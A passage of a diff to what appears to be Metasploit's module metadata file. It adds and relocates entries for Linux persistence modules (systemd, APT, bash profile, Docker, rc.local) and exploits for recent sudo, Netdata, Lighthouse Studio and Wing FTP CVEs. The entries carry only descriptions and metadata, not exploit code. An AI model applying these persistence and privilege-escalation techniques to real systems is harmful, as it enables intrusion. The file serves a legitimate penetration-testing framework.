-    "path": "/modules/exploits/linux/local/bash_profile_persistence.rb",
-    "is_install_path": true,
-    "ref_name": "linux/local/bash_profile_persistence",
-    "check": false,
-    "post_auth": false,
-    "default_credential": false,
-    "notes": {
-      "Reliability": [
-        "repeatable-session"
-      ],
-      "Stability": [
-        "crash-safe"
-      ],
-      "SideEffects": [
-        "artifacts-on-disk",
-        "config-changes"
-      ]
-    },
-    "session_types": [
-      "meterpreter",
-      "shell"
-    ],
-    "needs_cleanup": null,
-    "actions": []
-  },
  "exploit_linux/local/blueman_set_dhcp_handler_dbus_priv_esc": {
    "name": "blueman set_dhcp_handler D-Bus Privilege Escalation",
    "fullname": "exploit/linux/local/blueman_set_dhcp_handler_dbus_priv_esc",
@@ -88418,50 +89463,6 @@
    "needs_cleanup": true,
    "actions": []
  },
-  "exploit_linux/local/cron_persistence": {
-    "name": "Cron Persistence",
-    "fullname": "exploit/linux/local/cron_persistence",
-    "aliases": [],
-    "rank": 600,
-    "disclosure_date": "1979-07-01",
-    "type": "exploit",
-    "author": [
-      "h00die <mike@shorebreaksecurity.com>"
-    ],
-    "description": "This module will create a cron or crontab entry to execute a payload.\n          The module includes the ability to automatically clean up those entries to prevent multiple executions.\n          syslog will get a copy of the cron entry.",
-    "references": [],
-    "platform": "Linux,Unix",
-    "arch": "cmd",
-    "rport": null,
-    "autofilter_ports": [],
-    "autofilter_services": [],
-    "targets": [
-      "Cron",
-      "User Crontab",
-      "System Crontab"
-    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
-    "path": "/modules/exploits/linux/local/cron_persistence.rb",
-    "is_install_path": true,
-    "ref_name": "linux/local/cron_persistence",
-    "check": false,
-    "post_auth": false,
-    "default_credential": false,
-    "notes": {
-      "Reliability": [
-        "unknown-reliability"
-      ],
-      "Stability": [
-        "unknown-stability"
-      ],
-      "SideEffects": [
-        "unknown-side-effects"
-      ]
-    },
-    "session_types": [],
-    "needs_cleanup": true,
-    "actions": []
-  },
  "exploit_linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe": {
    "name": "Linux eBPF ALU32 32-bit Invalid Bounds Tracking LPE",
    "fullname": "exploit/linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe",
@@ -89991,49 +90992,53 @@
    "needs_cleanup": true,
    "actions": []
  },
-  "exploit_linux/local/motd_persistence": {
-    "name": "update-motd.d Persistence",
-    "fullname": "exploit/linux/local/motd_persistence",
+  "exploit_linux/local/ndsudo_cve_2024_32019": {
+    "name": "Netdata ndsudo privilege escalation",
+    "fullname": "exploit/linux/local/ndsudo_cve_2024_32019",
    "aliases": [],
    "rank": 300,
-    "disclosure_date": "1999-01-01",
+    "disclosure_date": "2024-04-12",
    "type": "exploit",
    "author": [
-      "Julien Voisin"
+      "msutovsky-r7",
+      "mia-0"
    ],
-    "description": "This module will add a script in /etc/update-motd.d/ in order to persist a payload.\n          The payload will be executed with root privileges everytime a user logs in.",
+    "description": "The `ndsudo` is a tool shipped with Netdata Agent. The version v1.45.0 and below contain vulnerability, which allows an attacker to gain privilege escalation using `ndsudo` binary. The vulnerability is untrusted search path, when searching for additional binary files, such as `nvme`. An attacker can create malicious binary with same name and add the directory of this binary into `$PATH` variable. The `ndsudo` will trust the first occurence of this binary and execute it.",
    "references": [
-      "URL-https://manpages.ubuntu.com/manpages/oracular/en/man5/update-motd.5.html"
+      "URL-https://github.com/netdata/netdata/security/advisories/GHSA-pmhq-4cxq-wj93",
+      "CVE-2024-32019"
    ],
-    "platform": "Linux,Unix",
-    "arch": "cmd",
+    "platform": "Linux",
+    "arch": "x86, x64",
    "rport": null,
    "autofilter_ports": [],
    "autofilter_services": [],
    "targets": [
-      "Automatic"
+      "Auto"
    ],
-    "mod_time": "2024-09-11 13:30:09 +0000",
-    "path": "/modules/exploits/linux/local/motd_persistence.rb",
+    "mod_time": "2025-08-20 12:49:38 +0000",
+    "path": "/modules/exploits/linux/local/ndsudo_cve_2024_32019.rb",
    "is_install_path": true,
-    "ref_name": "linux/local/motd_persistence",
-    "check": false,
+    "ref_name": "linux/local/ndsudo_cve_2024_32019",
+    "check": true,
    "post_auth": false,
    "default_credential": false,
    "notes": {
-      "Stability": [],
+      "Stability": [
+        "crash-safe"
+      ],
      "Reliability": [
-        "event-dependent"
+        "repeatable-session"
      ],
      "SideEffects": [
-        "artifacts-on-disk"
+        "ioc-in-logs"
      ]
    },
    "session_types": [
      "shell",
      "meterpreter"
    ],
-    "needs_cleanup": null,
+    "needs_cleanup": true,
    "actions": []
  },
  "exploit_linux/local/nested_namespace_idmap_limit_priv_esc": {
@@ -90833,51 +91838,6 @@
    "needs_cleanup": true,
    "actions": []
  },
-  "exploit_linux/local/rc_local_persistence": {
-    "name": "rc.local Persistence",
-    "fullname": "exploit/linux/local/rc_local_persistence",
-    "aliases": [],
-    "rank": 600,
-    "disclosure_date": "1980-10-01",
-    "type": "exploit",
-    "author": [
-      "Eliott Teissonniere"
-    ],
-    "description": "This module will edit /etc/rc.local in order to persist a payload.\n          The payload will be executed on the next reboot.",
-    "references": [],
-    "platform": "Linux,Unix",
-    "arch": "cmd",
-    "rport": null,
-    "autofilter_ports": [],
-    "autofilter_services": [],
-    "targets": [
-      "Automatic"
-    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
-    "path": "/modules/exploits/linux/local/rc_local_persistence.rb",
-    "is_install_path": true,
-    "ref_name": "linux/local/rc_local_persistence",
-    "check": false,
-    "post_auth": false,
-    "default_credential": false,
-    "notes": {
-      "Reliability": [
-        "unknown-reliability"
-      ],
-      "Stability": [
-        "unknown-stability"
-      ],
-      "SideEffects": [
-        "unknown-side-effects"
-      ]
-    },
-    "session_types": [
-      "shell",
-      "meterpreter"
-    ],
-    "needs_cleanup": null,
-    "actions": []
-  },
  "exploit_linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc": {
    "name": "Reliable Datagram Sockets (RDS) rds_atomic_free_op NULL pointer dereference Privilege Escalation",
    "fullname": "exploit/linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc",
@@ -91542,6 +92502,58 @@
    "needs_cleanup": true,
    "actions": []
  },
+  "exploit_linux/local/sudo_chroot_cve_2025_32463": {
+    "name": "Sudo Chroot 1.9.17 Privilege Escalation",
+    "fullname": "exploit/linux/local/sudo_chroot_cve_2025_32463",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": "2025-06-30",
+    "type": "exploit",
+    "author": [
+      "msutovsky-r7",
+      "Stratascale",
+      "Rich Mirch"
+    ],
+    "description": "Sudo before version 1.19.17p1 allows user to use `chroot` option, when\n          executing command. The option is intended to run a command with\n          user-selected root directory (if sudoers file allow it). Change in version\n          1.9.14 allows resolving paths via `chroot` using user-specified root\n          directory when sudoers is still evaluating.\n          This allows the attacker to trick Sudo into loading arbitrary shared object,\n          thus resulting in a privilege escalation.",
+    "references": [
+      "EDB-52352",
+      "URL-https://www.helpnetsecurity.com/2025/07/01/sudo-local-privilege-escalation-vulnerabilities-fixed-cve-2025-32462-cve-2025-32463/",
+      "CVE-2025-32463"
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": [],
+    "autofilter_services": [],
+    "targets": [
+      "Auto"
+    ],
+    "mod_time": "2025-08-27 17:58:11 +0000",
+    "path": "/modules/exploits/linux/local/sudo_chroot_cve_2025_32463.rb",
+    "is_install_path": true,
+    "ref_name": "linux/local/sudo_chroot_cve_2025_32463",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": [
+      "shell",
+      "meterpreter"
+    ],
+    "needs_cleanup": true,
+    "actions": []
+  },
  "exploit_linux/local/sudoedit_bypass_priv_esc": {
    "name": "Sudoedit Extra Arguments Priv Esc",
    "fullname": "exploit/linux/local/sudoedit_bypass_priv_esc",
@@ -92435,51 +93447,6 @@
    "needs_cleanup": true,
    "actions": []
  },
-  "exploit_linux/local/yum_package_manager_persistence": {
-    "name": "Yum Package Manager Persistence",
-    "fullname": "exploit/linux/local/yum_package_manager_persistence",
-    "aliases": [],
-    "rank": 600,
-    "disclosure_date": "2003-12-17",
-    "type": "exploit",
-    "author": [
-      "Aaron Ringo"
-    ],
-    "description": "This module will run a payload when the package manager is used. No\n          handler is ran automatically so you must configure an appropriate\n          exploit/multi/handler to connect. Module modifies a yum plugin to\n          launch a binary of choice. grep -F 'enabled=1' /etc/yum/pluginconf.d/\n          will show what plugins are currently enabled on the system.",
-    "references": [],
-    "platform": "Linux,Unix",
-    "arch": "cmd, x86, x64, armle, aarch64, ppc, mipsle, mipsbe",
-    "rport": null,
-    "autofilter_ports": [],
-    "autofilter_services": [],
-    "targets": [
-      "Automatic"
-    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
-    "path": "/modules/exploits/linux/local/yum_package_manager_persistence.rb",
-    "is_install_path": true,
-    "ref_name": "linux/local/yum_package_manager_persistence",
-    "check": false,
-    "post_auth": false,
-    "default_credential": false,
-    "notes": {
-      "Reliability": [
-        "unknown-reliability"
-      ],
-      "Stability": [
-        "unknown-stability"
-      ],
-      "SideEffects": [
-        "unknown-side-effects"
-      ]
-    },
-    "session_types": [
-      "shell",
-      "meterpreter"
-    ],
-    "needs_cleanup": true,
-    "actions": []
-  },
  "exploit_linux/local/zimbra_postfix_priv_esc": {
    "name": "Zimbra sudo + postfix privilege escalation",
    "fullname": "exploit/linux/local/zimbra_postfix_priv_esc",
@@ -94906,6 +95873,519 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_linux/persistence/apt_package_manager": {
+    "name": "APT Package Manager Persistence",
+    "fullname": "exploit/linux/persistence/apt_package_manager",
+    "aliases": [
+      "exploits/linux/local/apt_package_manager_persistence"
+    ],
+    "rank": 600,
+    "disclosure_date": "1999-03-09",
+    "type": "exploit",
+    "author": [
+      "Aaron Ringo"
+    ],
+    "description": "This module will run a payload when the APT package manager is used.\n          This module creates a pre-invoke hook for APT in apt.conf.d. Write access\n          to the apt.conf.d directory is required, typically requiring root access.\n          The hook name is randomized if not specified.\n          Verified on Ubuntu 22.04",
+    "references": [],
+    "platform": "Linux,Unix",
+    "arch": "cmd, x86, x64, armle, aarch64, ppc, mipsle, mipsbe",
+    "rport": null,
+    "autofilter_ports": [],
+    "autofilter_services": [],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2025-09-09 10:33:10 +0000",
+    "path": "/modules/exploits/linux/persistence/apt_package_manager.rb",
+    "is_install_path": true,
+    "ref_name": "linux/persistence/apt_package_manager",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session",
+        "event-dependent"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "config-changes"
+      ]
+    },
+    "session_types": [
+      "shell",
+      "meterpreter"
+    ],
+    "needs_cleanup": true,
+    "actions": []
+  },
+  "exploit_linux/persistence/autostart": {
+    "name": "Autostart Desktop Item Persistence",
+    "fullname": "exploit/linux/persistence/autostart",
+    "aliases": [
+      "exploits/linux/local/autostart_persistence"
+    ],
+    "rank": 600,
+    "disclosure_date": "2006-02-13",
+    "type": "exploit",
+    "author": [
+      "Eliott Teissonniere"
+    ],
+    "description": "This module will create an autostart .desktop entry to execute a payload.\n          The payload will be executed when the users logs in.\n          Verified on Ubuntu 22.04 desktop with Gnome, and 18.04.3.\n          The following payloads were used in testing:\n          - cmd/unix/reverse_netcat\n          - linux/x64/meterpreter/reverse_tcp\n          - cmd/linux/http/x64/meterpreter/reverse_tcp",
+    "references": [
+      "ATT&CK-T1547.013",
+      "URL-https://specifications.freedesktop.org/autostart-spec/latest/"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd, x86, x64, armle, aarch64, ppc, mipsle, mipsbe",
+    "rport": null,
+    "autofilter_ports": [],
+    "autofilter_services": [],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2025-09-10 13:59:23 +0000",
+    "path": "/modules/exploits/linux/persistence/autostart.rb",
+    "is_install_path": true,
+    "ref_name": "linux/persistence/autostart",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session",
+        "event-dependent"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "config-changes"
+      ]
+    },
+    "session_types": [
+      "shell",
+      "meterpreter"
+    ],
+    "needs_cleanup": true,
+    "actions": []
+  },
+  "exploit_linux/persistence/bash_profile": {
+    "name": "Bash Profile Persistence",
+    "fullname": "exploit/linux/persistence/bash_profile",
+    "aliases": [
+      "exploits/linux/local/bash_profile_persistence"
+    ],
+    "rank": 600,
+    "disclosure_date": "1989-06-08",
+    "type": "exploit",
+    "author": [
+      "Michael Long <bluesentinel@protonmail.com>"
+    ],
+    "description": "This module writes an execution trigger to the target's Bash profile.\n          The execution trigger executes a call back payload whenever the target\n          user opens a Bash terminal.\n          Verified on Ubuntu 22.04 and 18.04 desktop with Gnome",
+    "references": [
+      "ATT&CK-T1546.004"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd, x86, x64, armle, aarch64, ppc, mipsle, mipsbe",
+    "rport": null,
+    "autofilter_ports": [],
+    "autofilter_services": [],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2025-09-09 10:02:06 +0000",
+    "path": "/modules/exploits/linux/persistence/bash_profile.rb",
+    "is_install_path": true,
+    "ref_name": "linux/persistence/bash_profile",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Reliability": [
+        "repeatable-session",
+        "event-dependent"
+      ],
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "config-changes"
+      ]
+    },
+    "session_types": [
+      "meterpreter",
+      "shell"
+    ],
+    "needs_cleanup": null,
+    "actions": []
+  },
+  "exploit_linux/persistence/docker_image": {
+    "name": "Docker Image Persistence",
+    "fullname": "exploit/linux/persistence/docker_image",
+    "aliases": [],
+    "rank": 600,
+    "disclosure_date": "2013-03-20",
+    "type": "exploit",
+    "author": [
+      "h00die"
+    ],
+    "description": "This module maintains persistence on a host by creating a docker image which runs our\n          payload, and has access to the host's file system (/host in the container). Whenever the\n          container restarts, the payload will run, or when the payload dies the executable\n          will run again after a delay. This will allow for writing back\n          into the host through cron entries, ssh keys, or other method.\n\n          Verified on Ubuntu 22.04.",
+    "references": [
+      "ATT&CK-T1610"
+    ],
+    "platform": "Linux",
+    "arch": "x86, x64, armle, aarch64, ppc, mipsle, mipsbe",
+    "rport": null,
+    "autofilter_ports": [],
+    "autofilter_services": [],
+    "targets": [
+      "Auto"
+    ],
+    "mod_time": "2025-09-16 15:57:24 +0000",
+    "path": "/modules/exploits/linux/persistence/docker_image.rb",
+    "is_install_path": true,
+    "ref_name": "linux/persistence/docker_image",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "config-changes",
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": [
+      "meterpreter"
+    ],
+    "needs_cleanup": true,
+    "actions": []
+  },
+  "exploit_linux/persistence/init_openrc": {
+    "name": "Init OpenRC Persistence",
+    "fullname": "exploit/linux/persistence/init_openrc",
+    "aliases": [
+      "exploits/linux/local/service_persistence"
+    ],
+    "rank": 600,
+    "disclosure_date": "2007-04-05",
+    "type": "exploit",
+    "author": [
+      "h00die"
+    ],
+    "description": "This module will create a service on the box via OpenRC, and mark it for auto-restart.\n          We need enough access to write service files and potentially restart services.\n          Verified against alpine 3.21.2",
+    "references": [
+      "URL-https://www.digitalocean.com/community/tutorials/how-to-configure-a-linux-service-to-start-automatically-after-a-crash-or-reboot-part-1-practical-examples",
+      "ATT&CK-T1543",
+      "URL-https://wiki.alpinelinux.org/wiki/Writing_Init_Scripts",
+      "URL-https://wiki.alpinelinux.org/wiki/OpenRC",
+      "URL-https://github.com/OpenRC/openrc/blob/master/service-script-guide.md"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd, x86, x64, armle, aarch64, ppc, mipsle, mipsbe",
+    "rport": null,
+    "autofilter_ports": [],
+    "autofilter_services": [],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2025-09-11 12:00:52 +0000",
+    "path": "/modules/exploits/linux/persistence/init_openrc.rb",
+    "is_install_path": true,
+    "ref_name": "linux/persistence/init_openrc",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session",
+        "event-dependent"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "config-changes"
+      ]
+    },
+    "session_types": [
+      "shell",
+      "meterpreter"
+    ],
+    "needs_cleanup": true,
+    "actions": []
+  },
+  "exploit_linux/persistence/init_systemd": {
+    "name": "Service SystemD Persistence",
+    "fullname": "exploit/linux/persistence/init_systemd",
+    "aliases": [
+      "exploits/linux/local/service_persistence"
+    ],
+    "rank": 600,
+    "disclosure_date": "2010-03-30",
+    "type": "exploit",
+    "author": [
+      "h00die <mike@shorebreaksecurity.com>",
+      "Cale Black"
+    ],
+    "description": "This module will create a service on the box, and mark it for auto-restart.\n          We need enough access to write service files and potentially restart services\n          Targets:\n          CentOS 7\n          Debian >= 7, <=8\n          Fedora >= 15\n          Ubuntu >= 15.04\n          Verified on Ubuntu 18.04.3",
+    "references": [
+      "URL-https://www.digitalocean.com/community/tutorials/how-to-configure-a-linux-service-to-start-automatically-after-a-crash-or-reboot-part-1-practical-examples",
+      "URL-https://coreos.com/docs/launching-containers/launching/getting-started-with-systemd/",
+      "ATT&CK-T1543.002"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd, x86, x64, armle, aarch64, ppc, mipsle, mipsbe",
+    "rport": null,
+    "autofilter_ports": [],
+    "autofilter_services": [],
+    "targets": [
+      "systemd",
+      "systemd user"
+    ],
+    "mod_time": "2025-09-09 16:19:32 +0000",
+    "path": "/modules/exploits/linux/persistence/init_systemd.rb",
+    "is_install_path": true,
+    "ref_name": "linux/persistence/init_systemd",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session",
+        "event-dependent"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "config-changes"
+      ]
+    },
+    "session_types": [
+      "shell",
+      "meterpreter"
+    ],
+    "needs_cleanup": true,
+    "actions": []
+  },
+  "exploit_linux/persistence/init_systemd_override": {
+    "name": "Service SystemD override.conf Persistence",
+    "fullname": "exploit/linux/persistence/init_systemd_override",
+    "aliases": [],
+    "rank": 600,
+    "disclosure_date": "2010-03-30",
+    "type": "exploit",
+    "author": [
+      "h00die"
+    ],
+    "description": "This module will create an override.conf file for a SystemD service on the box.\n          The ExecStartPost hook is used to launch the payload after the service is started.\n          We need enough access (typically root) to write in the /etc/systemd/system\n          directory and potentially restart services.\n          Verified on Ubuntu 22.04",
+    "references": [
+      "URL-https://www.freedesktop.org/software/systemd/man/latest/systemd.service.html",
+      "URL-https://askubuntu.com/a/659268",
+      "URL-https://wiki.archlinux.org/title/Systemd",
+      "ATT&CK-T1543.002"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd, x86, x64, armle, aarch64, ppc, mipsle, mipsbe",
+    "rport": null,
+    "autofilter_ports": [],
+    "autofilter_services": [],
+    "targets": [
+      "systemd",
+      "systemd user"
+    ],
+    "mod_time": "2025-09-26 15:00:09 +0000",
+    "path": "/modules/exploits/linux/persistence/init_systemd_override.rb",
+    "is_install_path": true,
+    "ref_name": "linux/persistence/init_systemd_override",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session",
+        "event-dependent"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "config-changes"
+      ]
+    },
+    "session_types": [
+      "shell",
+      "meterpreter"
+    ],
+    "needs_cleanup": true,
+    "actions": []
+  },
+  "exploit_linux/persistence/motd": {
+    "name": "update-motd.d Persistence",
+    "fullname": "exploit/linux/persistence/motd",
+    "aliases": [
+      "exploits/linux/local/motd_persistence"
+    ],
+    "rank": 600,
+    "disclosure_date": "1999-01-01",
+    "type": "exploit",
+    "author": [
+      "Julien Voisin"
+    ],
+    "description": "This module will add a script in /etc/update-motd.d/ in order to persist a payload.\n          The payload will be executed with root privileges everytime a user logs in.\n          Root privileges are likely required to write to /etc/update-motd.d/.\n          Verified on Ubuntu 22.04",
+    "references": [
+      "URL-https://manpages.ubuntu.com/manpages/oracular/en/man5/update-motd.5.html"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd, x86, x64, armle, aarch64, ppc, mipsle, mipsbe",
+    "rport": null,
+    "autofilter_ports": [],
+    "autofilter_services": [],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2025-09-09 14:29:07 +0000",
+    "path": "/modules/exploits/linux/persistence/motd.rb",
+    "is_install_path": true,
+    "ref_name": "linux/persistence/motd",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session",
+        "event-dependent"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": [
+      "shell",
+      "meterpreter"
+    ],
+    "needs_cleanup": null,
+    "actions": []
+  },
+  "exploit_linux/persistence/rc_local": {
+    "name": "rc.local Persistence",
+    "fullname": "exploit/linux/persistence/rc_local",
+    "aliases": [
+      "exploits/linux/local/rc_local_persistence"
+    ],
+    "rank": 600,
+    "disclosure_date": "1980-10-01",
+    "type": "exploit",
+    "author": [
+      "Eliott Teissonniere"
+    ],
+    "description": "This module will edit /etc/rc.local in order to persist a payload.\n          The payload will be executed on the next reboot.\n          Verified on Ubuntu 18.04.3",
+    "references": [
+      "ATT&CK-T1037.004"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd, x86, x64, armle, aarch64, ppc, mipsle, mipsbe",
+    "rport": null,
+    "autofilter_ports": [],
+    "autofilter_services": [],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2025-09-09 14:58:09 +0000",
+    "path": "/modules/exploits/linux/persistence/rc_local.rb",
+    "is_install_path": true,
+    "ref_name": "linux/persistence/rc_local",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session",
+        "event-dependent"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "config-changes"
+      ]
+    },
+    "session_types": [
+      "shell",
+      "meterpreter"
+    ],
+    "needs_cleanup": null,
+    "actions": []
+  },
+  "exploit_linux/persistence/yum_package_manager": {
+    "name": "Yum Package Manager Persistence",
+    "fullname": "exploit/linux/persistence/yum_package_manager",
+    "aliases": [
+      "exploits/linux/local/yum_package_manager_persistence"
+    ],
+    "rank": 600,
+    "disclosure_date": "2003-12-17",
+    "type": "exploit",
+    "author": [
+      "Aaron Ringo"
+    ],
+    "description": "This module will run a payload when the package manager is used.\n          This module modifies a yum plugin to launch a binary of choice.\n          grep -F 'enabled=1' /etc/yum/pluginconf.d/\n          will show what plugins are currently enabled on the system.\n          root persmissions are likely required.\n          Verified on Centos 7.1",
+    "references": [],
+    "platform": "Linux,Unix",
+    "arch": "cmd, x86, x64, armle, aarch64, ppc, mipsle, mipsbe",
+    "rport": null,
+    "autofilter_ports": [],
+    "autofilter_services": [],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2025-09-18 16:15:24 +0000",
+    "path": "/modules/exploits/linux/persistence/yum_package_manager.rb",
+    "is_install_path": true,
+    "ref_name": "linux/persistence/yum_package_manager",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session",
+        "event-dependent"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "config-changes"
+      ]
+    },
+    "session_types": [
+      "shell",
+      "meterpreter"
+    ],
+    "needs_cleanup": true,
+    "actions": []
+  },
  "exploit_linux/pop3/cyrus_pop3d_popsubfolders": {
    "name": "Cyrus IMAPD pop3d popsubfolders USER Buffer Overflow",
    "fullname": "exploit/linux/pop3/cyrus_pop3d_popsubfolders",
@@ -95303,7 +96783,7 @@
      "Linux SPARC64",
      "Linux s390x"
    ],
-    "mod_time": "2025-06-06 12:39:33 +0000",
+    "mod_time": "2025-09-17 11:04:28 +0000",
    "path": "/modules/exploits/linux/samba/is_known_pipename.rb",
    "is_install_path": true,
    "ref_name": "linux/samba/is_known_pipename",
@@ -100245,6 +101725,52 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_multi/fileformat/xdg_desktop": {
+    "name": "Malicious XDG Desktop File",
+    "fullname": "exploit/multi/fileformat/xdg_desktop",
+    "aliases": [],
+    "rank": 500,
+    "disclosure_date": "2007-02-06",
+    "type": "exploit",
+    "author": [
+      "bcoles <bcoles@gmail.com>"
+    ],
+    "description": "This module creates a malicious XDG Desktop (.desktop) file.\n\n          On most modern systems, desktop files are not trusted by default.\n          The user will receive a warning prompt that the file is not trusted\n          when running the file, but may choose to run the file anyway.\n\n          The default file manager applications in some desktop environments\n          may impose more strict execution requirements by prompting the user\n          to set the file as executable and/or marking the file as trusted\n          before the file can be executed.",
+    "references": [
+      "ATT&CK-T1204.002",
+      "URL-https://specifications.freedesktop.org/desktop-entry-spec/latest/",
+      "URL-https://specifications.freedesktop.org/desktop-entry-spec/latest/exec-variables.html",
+      "URL-https://wiki.archlinux.org/title/Desktop_entries"
+    ],
+    "platform": "FreeBSD,Linux,Solaris,Unix",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": [],
+    "autofilter_services": [],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2025-08-04 19:23:02 +0000",
+    "path": "/modules/exploits/multi/fileformat/xdg_desktop.rb",
+    "is_install_path": true,
+    "ref_name": "multi/fileformat/xdg_desktop",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "screen-effects"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_multi/fileformat/zip_slip": {
    "name": "Generic Zip Slip Traversal Vulnerability",
    "fullname": "exploit/multi/fileformat/zip_slip",
@@ -107937,6 +109463,66 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_multi/http/lighthouse_studio_unauth_rce_cve_2025_34300": {
+    "name": "Template Injection Vulnerability in Sawtooth Software's Lighthouse Studio (CVE-2025-34300)",
+    "fullname": "exploit/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300",
+    "aliases": [],
+    "rank": 600,
+    "disclosure_date": "2025-07-16",
+    "type": "exploit",
+    "author": [
+      "Maksim Rogov",
+      "Adam Kues"
+    ],
+    "description": "This module exploits a template injection vulnerability in the\n          Sawtooth Software Lighthouse Studio's `ciwweb.pl` web application.\n          The application fails to properly sanitize user input within survey templates,\n          allowing unauthenticated attackers to inject and execute arbitrary Perl commands\n          on the target system.\n\n          This vulnerability affects Lighthouse Studio versions prior to 9.16.14.\n          Successful exploitation may result in remote code execution under the privileges\n          of the web server, potentially exposing sensitive data or disrupting survey operations.\n\n          An attacker can execute arbitrary system commands in the context of the user running the web server.",
+    "references": [
+      "CVE-2025-34300",
+      "URL-https://slcyber.io/assetnote-security-research-center/rce-in-the-most-popular-survey-software-youve-never-heard-of/"
+    ],
+    "platform": "Multi",
+    "arch": "cmd",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Unix Command",
+      "Windows Command"
+    ],
+    "mod_time": "2025-07-26 03:15:00 +0000",
+    "path": "/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/lighthouse_studio_unauth_rce_cve_2025_34300",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_multi/http/log1cms_ajax_create_folder": {
    "name": "Log1 CMS writeInfo() PHP Code Injection",
    "fullname": "exploit/multi/http/log1cms_ajax_create_folder",
@@ -116967,7 +118553,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2024-06-14 12:05:12 +0000",
+    "mod_time": "2025-08-22 17:01:41 +0000",
    "path": "/modules/exploits/multi/http/torchserver_cve_2023_43654.rb",
    "is_install_path": true,
    "ref_name": "multi/http/torchserver_cve_2023_43654",
@@ -118519,6 +120105,66 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_multi/http/wingftp_null_byte_rce": {
+    "name": "Wing FTP Server NULL-byte Authentication Bypass (CVE-2025-47812)",
+    "fullname": "exploit/multi/http/wingftp_null_byte_rce",
+    "aliases": [],
